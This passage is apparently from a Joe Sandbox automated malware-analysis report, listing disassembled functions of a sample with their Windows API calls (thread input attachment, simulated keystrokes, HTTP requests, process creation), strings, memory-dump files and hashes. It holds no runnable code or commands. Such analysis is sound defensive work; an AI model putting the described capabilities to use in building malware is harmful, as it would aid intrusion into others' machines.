                                                          • GetForegroundWindow.USER32(00000000,?,?,?,?,?,003A0599,?,00000001), ref: 003A1535
                                                          • GetWindowThreadProcessId.USER32(00000000), ref: 003A153C
                                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,003A0599,?,00000001), ref: 003A154B
                                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 003A155D
                                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,003A0599,?,00000001), ref: 003A1576
                                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,003A0599,?,00000001), ref: 003A1588
                                                          • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,003A0599,?,00000001), ref: 003A15CD
                                                          • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,003A0599,?,00000001), ref: 003A15E2
                                                          • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,003A0599,?,00000001), ref: 003A15ED
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                          • String ID:
                                                          • API String ID: 2156557900-0
                                                          • Opcode ID: 2d9c64ab200b4c0040f7c00c7f2642a0b09440c2e626c767293be912c76fde93
                                                          • Instruction ID: b4928d0fc5df5216a4da634c025a1c9dd7c3a2b4acd73c2422aa777ba0c98f46
                                                          • Opcode Fuzzy Hash: 2d9c64ab200b4c0040f7c00c7f2642a0b09440c2e626c767293be912c76fde93
                                                          • Instruction Fuzzy Hash: FC310471D00205FFEB229F90ED44F6937AEEB87351F124026FA02D61A0D7B0AD508B68
                                                          Function 0034FBBD Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 0034FC06
                                                          • OleUninitialize.OLE32(?,00000000), ref: 0034FCA5
                                                          • UnregisterHotKey.USER32(?), ref: 0034FDFC
                                                          • DestroyWindow.USER32(?), ref: 0038492F
                                                          • FreeLibrary.KERNEL32(?), ref: 00384994
                                                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 003849C1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                          • String ID: close all
                                                          • API String ID: 469580280-3243417748
                                                          • Opcode ID: a564c8b44e3de4dedad310384ca580ddb01d668280a55dc34f8492687491f69a
                                                          • Instruction ID: 8b79512780fcc5bab7801b0c61aeb4b872fe30a0f5321760e115792f9731bfbc
                                                          • Opcode Fuzzy Hash: a564c8b44e3de4dedad310384ca580ddb01d668280a55dc34f8492687491f69a
                                                          • Instruction Fuzzy Hash: 15A15C31701612CFCB2BEF14C995A2AF7A4AF05750F5542ADE80AAF662DB30ED16CF50
                                                          Function 003B9228 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 263COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Variant$ClearInit$_memset
                                                          • String ID: ,,=$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                          • API String ID: 2862541840-1434771687
                                                          • Opcode ID: c7cc6e889c062e01264c401a06cc99289cb7659d34bdef40d69fab0941dcc1cf
                                                          • Instruction ID: ca19242d1123cb7e883f505ef3bf76c202b381c9a96daf80c33c1928680eb8dc
                                                          • Opcode Fuzzy Hash: c7cc6e889c062e01264c401a06cc99289cb7659d34bdef40d69fab0941dcc1cf
                                                          • Instruction Fuzzy Hash: D491AE71A00219AFDF26CFA5C844FEEBBB8EF45714F11855AF709AB680D7709901CBA0
                                                          Function 0039A473 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • EnumChildWindows.USER32(?,0039A844), ref: 0039A782
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: ChildEnumWindows
                                                          • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                          • API String ID: 3555792229-1603158881
                                                          • Opcode ID: 2102fc0d233995dd2b5d94c178e74f3e762d80ecfb16709e438c118cfadb70b6
                                                          • Instruction ID: 7a370e2535ccaa47188ed5c17d47b6631597e29c8a203ad0803b31faf00096a7
                                                          • Opcode Fuzzy Hash: 2102fc0d233995dd2b5d94c178e74f3e762d80ecfb16709e438c118cfadb70b6
                                                          • Instruction Fuzzy Hash: 7791C670A04906ABCF0AEFA0C492BEEFBB5FF04304F548219D959AB151DF306959CBD1
                                                          Function 00342E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetWindowLongW.USER32(?,000000EB), ref: 00342EAE
                                                            • Part of subcall function 00341DB3: GetClientRect.USER32(?,?), ref: 00341DDC
                                                            • Part of subcall function 00341DB3: GetWindowRect.USER32(?,?), ref: 00341E1D
                                                            • Part of subcall function 00341DB3: ScreenToClient.USER32(?,?), ref: 00341E45
                                                          • GetDC.USER32 ref: 0037CEB2
                                                          • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0037CEC5
                                                          • SelectObject.GDI32(00000000,00000000), ref: 0037CED3
                                                          • SelectObject.GDI32(00000000,00000000), ref: 0037CEE8
                                                          • ReleaseDC.USER32(?,00000000), ref: 0037CEF0
                                                          • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0037CF7B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                          • String ID: U
                                                          • API String ID: 4009187628-3372436214
                                                          • Opcode ID: 65ffa7c72b79785cd4161b96a6fd22eae357a4b76c7a4261caa731bfe6e5f216
                                                          • Instruction ID: 604ee2734c053bdf56eae308cc124457d8f683e85eccf459b4f2865f617ca1b1
                                                          • Opcode Fuzzy Hash: 65ffa7c72b79785cd4161b96a6fd22eae357a4b76c7a4261caa731bfe6e5f216
                                                          • Instruction Fuzzy Hash: E471AF31400205DFCF339F64C880AAA7BBAFF49311F15926EFD59AA266C7359891DF60
                                                          Function 003B1B2B Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 134networkCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 003B1B66
                                                          • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 003B1B92
                                                          • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 003B1BD4
                                                          • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 003B1BE9
                                                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003B1BF6
                                                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 003B1C26
                                                          • InternetCloseHandle.WININET(00000000), ref: 003B1C6D
                                                            • Part of subcall function 003B2599: GetLastError.KERNEL32(?,?,003B192D,00000000,00000000,00000001), ref: 003B25AE
                                                            • Part of subcall function 003B2599: SetEvent.KERNEL32(?,?,003B192D,00000000,00000000,00000001), ref: 003B25C3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                          • String ID:
                                                          • API String ID: 2603140658-3916222277
                                                          • Opcode ID: 13eb596fd21f563ebe801493b7a0936e385a5d33cc7db1d4929248dd65be3a77
                                                          • Instruction ID: 53e489c35b11d9b50dad4d10304d5fa1316882b4e8518586fcaca81ecd41e605
                                                          • Opcode Fuzzy Hash: 13eb596fd21f563ebe801493b7a0936e385a5d33cc7db1d4929248dd65be3a77
                                                          • Instruction Fuzzy Hash: 5C417FB1540218BFEB139F50CC99FFB7BADEF09358F40412AFA059A541EB709E449BA0
                                                          Function 003B8D5B Relevance: 13.9, APIs: 9, Instructions: 438COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleFileNameW.KERNEL32(?,?,00000104,?,003CF910), ref: 003B8E3D
                                                          • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,003CF910), ref: 003B8E71
                                                          • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 003B8FEB
                                                          • SysFreeString.OLEAUT32(?), ref: 003B9015
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                          • String ID:
                                                          • API String ID: 560350794-0
                                                          • Opcode ID: 9b7e09214d58116b5f2987a0084aa4faa7102a837d4052936bf08826c922ef7a
                                                          • Instruction ID: f689c5020d2af0a0494a31c5327012e1fa993e73f4878b8befcee82023541fea
                                                          • Opcode Fuzzy Hash: 9b7e09214d58116b5f2987a0084aa4faa7102a837d4052936bf08826c922ef7a
                                                          • Instruction Fuzzy Hash: 7BF12971A00209EFCB05DF94C888EEEB7BAFF49319F118059F615AB650DB31AE45CB50
                                                          Function 003BF7A8 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • _memset.LIBCMT ref: 003BF7C9
                                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 003BF95C
                                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 003BF980
                                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 003BF9C0
                                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 003BF9E2
                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 003BFB5E
                                                          • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 003BFB90
                                                          • CloseHandle.KERNEL32(?), ref: 003BFBBF
                                                          • CloseHandle.KERNEL32(?), ref: 003BFC36
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                          • String ID:
                                                          • API String ID: 4090791747-0
                                                          • Opcode ID: 77a7982efb9a0f731fc3353d487821b0582249e1391e0011d7a9210dde9881d2
                                                          • Instruction ID: 29cf0afa6f6496230cc7a9366e71a7f51c3d2da0accef29cac35d7f80716bc6c
                                                          • Opcode Fuzzy Hash: 77a7982efb9a0f731fc3353d487821b0582249e1391e0011d7a9210dde9881d2
                                                          • Instruction Fuzzy Hash: BCE1A0316043009FCB16EF24C881BAABBE5AF85314F15856DF9999F6A2CB31EC45CB52
                                                          Function 003A4D68 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 003A46AF: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,003A36DB,?), ref: 003A46CC
                                                            • Part of subcall function 003A46AF: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,003A36DB,?), ref: 003A46E5
                                                            • Part of subcall function 003A4AD8: GetFileAttributesW.KERNEL32(?,003A374F), ref: 003A4AD9
                                                          • lstrcmpiW.KERNEL32(?,?), ref: 003A4DE7
                                                          • _wcscmp.LIBCMT ref: 003A4E01
                                                          • MoveFileW.KERNEL32(?,?), ref: 003A4E1C
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                          • String ID:
                                                          • API String ID: 793581249-0
                                                          • Opcode ID: 5c0100c55002143fa7ce5cabcdaa18f2afef44d438cc61521d52d55e862740ba
                                                          • Instruction ID: 048763776a7cee782e56dbd66c084861c2c3fb950842b49d3209ca98f7784713
                                                          • Opcode Fuzzy Hash: 5c0100c55002143fa7ce5cabcdaa18f2afef44d438cc61521d52d55e862740ba
                                                          • Instruction Fuzzy Hash: 67515FB24087849BC726DBA4D881DDFB7ECEF85300F10492EB589D7152EF74A6888766
                                                          Function 003C8677 Relevance: 13.7, APIs: 9, Instructions: 168COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 003C8731
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: InvalidateRect
                                                          • String ID:
                                                          • API String ID: 634782764-0
                                                          • Opcode ID: e4197026b66c4daa57e282195a946a2b176c546a9c250042f5d473e35f803b05
                                                          • Instruction ID: a9993e43ef25fad2f3620c59b0acc3d7363ef7893246be25e1bfe4a9dc2384bf
                                                          • Opcode Fuzzy Hash: e4197026b66c4daa57e282195a946a2b176c546a9c250042f5d473e35f803b05
                                                          • Instruction Fuzzy Hash: 93518070500314BEEB229F69CC89F997BA9EB05310F604529FA15EA5E1CF71BF90DB50
                                                          Function 00342B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0037C477
                                                          • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0037C499
                                                          • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0037C4B1
                                                          • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0037C4CF
                                                          • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0037C4F0
                                                          • DestroyIcon.USER32(00000000), ref: 0037C4FF
                                                          • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0037C51C
                                                          • DestroyIcon.USER32(?), ref: 0037C52B
                                                            • Part of subcall function 003CA4E1: DeleteObject.GDI32(00000000), ref: 003CA51A
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                          • String ID:
                                                          • API String ID: 2819616528-0
                                                          • Opcode ID: 1a876374560fee1d6ec8582244c5266b8b688a48c0ae4b0940c0950b2532c782
                                                          • Instruction ID: 53c9ff8de9b494ba888e06572aaf18677d0839adf9b7b508b5715ab76fc434e3
                                                          • Opcode Fuzzy Hash: 1a876374560fee1d6ec8582244c5266b8b688a48c0ae4b0940c0950b2532c782
                                                          • Instruction Fuzzy Hash: 38517770610209AFDB26DF25CC45FAB3BE9EB58320F114528F906EB2A0DB70BD90DB50
                                                          Function 00399930 Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 0039AC37: GetWindowThreadProcessId.USER32(?,00000000), ref: 0039AC57
                                                            • Part of subcall function 0039AC37: GetCurrentThreadId.KERNEL32 ref: 0039AC5E
                                                            • Part of subcall function 0039AC37: AttachThreadInput.USER32(00000000,?,00399945,?,00000001), ref: 0039AC65
                                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 00399950
                                                          • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 0039996D
                                                          • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00399970
                                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 00399979
                                                          • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00399997
                                                          • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 0039999A
                                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 003999A3
                                                          • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 003999BA
                                                          • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 003999BD
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                          • String ID:
                                                          • API String ID: 2014098862-0
                                                          • Opcode ID: 16d02c010455337803a17e96cc880eabab6ce793b8d5607a4668f00bfdce5611
                                                          • Instruction ID: 3b99b9f3306779342064567757805a33a676d65e3fd98f041c01a6000ea0b235
                                                          • Opcode Fuzzy Hash: 16d02c010455337803a17e96cc880eabab6ce793b8d5607a4668f00bfdce5611
                                                          • Instruction Fuzzy Hash: 9E11E171550618BFFA116B65CC89F6A7B2EEB4C755F11042AF244EB0A0CAF36C10DBA4
                                                          Function 00398BE3 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetProcessHeap.KERNEL32(00000008,0000000C), ref: 00398BEC
                                                          • HeapAlloc.KERNEL32(00000000), ref: 00398BF3
                                                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 00398C08
                                                          • GetCurrentProcess.KERNEL32(?,00000000), ref: 00398C10
                                                          • DuplicateHandle.KERNEL32(00000000), ref: 00398C13
                                                          • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002), ref: 00398C23
                                                          • GetCurrentProcess.KERNEL32(?,00000000), ref: 00398C2B
                                                          • DuplicateHandle.KERNEL32(00000000), ref: 00398C2E
                                                          • CreateThread.KERNEL32(00000000,00000000,00398C54,00000000,00000000,00000000), ref: 00398C48
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                          • String ID:
                                                          • API String ID: 1957940570-0
                                                          • Opcode ID: 64696ec4189f1d5a749e822a250b7446ad80cfef5179ad2902498c8decd8eab2
                                                          • Instruction ID: 68855f9b39adf04b2245c7b6b0e221bfe143d974aea4b16355afc086cdf9c5e6
                                                          • Opcode Fuzzy Hash: 64696ec4189f1d5a749e822a250b7446ad80cfef5179ad2902498c8decd8eab2
                                                          • Instruction Fuzzy Hash: 8301B6B5240348FFEB11ABA5DC4DF6B7BADEB89711F044421FA05DB2A1CA70A800CB20
                                                          Function 003B9C38 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 352COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: NULL Pointer assignment$Not an Object type
                                                          • API String ID: 0-572801152
                                                          • Opcode ID: 110ec5df6e70e1d832ce8c197f7a36ebfbebd866ff9758fb50c3672c8ed6e57c
                                                          • Instruction ID: 3dc960cc8c461d998a034088babe9c757b695a3f5e4558812780ca078b5f2148
                                                          • Opcode Fuzzy Hash: 110ec5df6e70e1d832ce8c197f7a36ebfbebd866ff9758fb50c3672c8ed6e57c
                                                          • Instruction Fuzzy Hash: 46C19271A002199FDF15CFA8C885BEEB7B9EF48318F15842AEB05EB680D7709D41CB60
                                                          Function 003B9872 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON
